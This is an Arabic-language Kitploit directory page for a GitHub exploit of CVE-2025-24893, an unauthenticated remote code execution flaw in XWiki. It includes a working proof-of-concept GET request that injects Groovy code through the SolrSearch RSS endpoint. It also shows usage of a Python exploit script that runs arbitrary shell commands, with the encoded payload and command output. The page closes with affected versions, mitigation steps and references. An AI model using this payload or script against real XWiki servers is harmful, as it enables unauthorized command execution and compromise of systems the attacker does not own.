Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24893 | Kitploit
أدوات/GitHubGitHub/b0ysie7e/cve-2025-24893
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

عرض المستودع
113منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2025-24893

CVE-2025-24893 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) دون مصادقة تؤثر على منصة XWiki.
تسمح هذه الثغرة لأي مستخدم ضيف بحقن وتنفيذ كود Groovy عشوائي — دون مصادقة — عبر طلب RSS مصمم خصيصًا إلى نقطة نهاية SolrSearch.

يؤثر هذا بشكل مباشر على السرية والنزاهة والتوافر للنظام المتأثر.

الملخص

  • النسخ المتأثرة:
    • XWiki ≥ 5.3-milestone-2 حتى < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 حتى < 16.4.1
  • درجة CVSS v3.1: 9.8 (حرجة)
    المتجه: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • قابلية الاستغلال: سهلة جدًا — طلب HTTP GET واحد يكفي.

⚠️ إخلاء مسؤولية:

هذا الكود مخصص حصريًا لأغراض التعليم والبحث. الاستخدام غير المصرح به على أنظمة دون إذن صريح قد يشكل انتهاكًا للقانون. المؤلف غير مسؤول عن أي إساءة استخدام أو نشاط ضار يتعلق بهذه الأداة.

إثبات المفهوم (POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

دليل استخدام سكربت الاستغلال

يشرح هذا القسم كيفية إعداد وتشغيل سكربت الاستغلال بلغة Python للاستفادة من CVE-2025-24893.


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

التخفيف

التحديث إلى الإصدارات المُصحَّحة:

لإصلاح الثغرة، قم بتحديث XWiki إلى أحد الإصدارات التالية:

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

حل بديل مؤقت:

إذا لم يكن التحديث ممكنًا فورًا، يمكنك تطبيق إصلاح مؤقت:

  1. قم بتحرير الملف SolrSearchMacros.xml (الموجود في Main.SolrSearchMacros) حوالي السطر 955.
  2. استبدل منطق الإخراج لاستخدام ماكرو rawResponse مع ضبط نوع المحتوى على application/xml.
    استخدم التنفيذ الموجود في macros.vm في السطر 2824 كمرجع.

المراجع:

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
تنزيل الأداة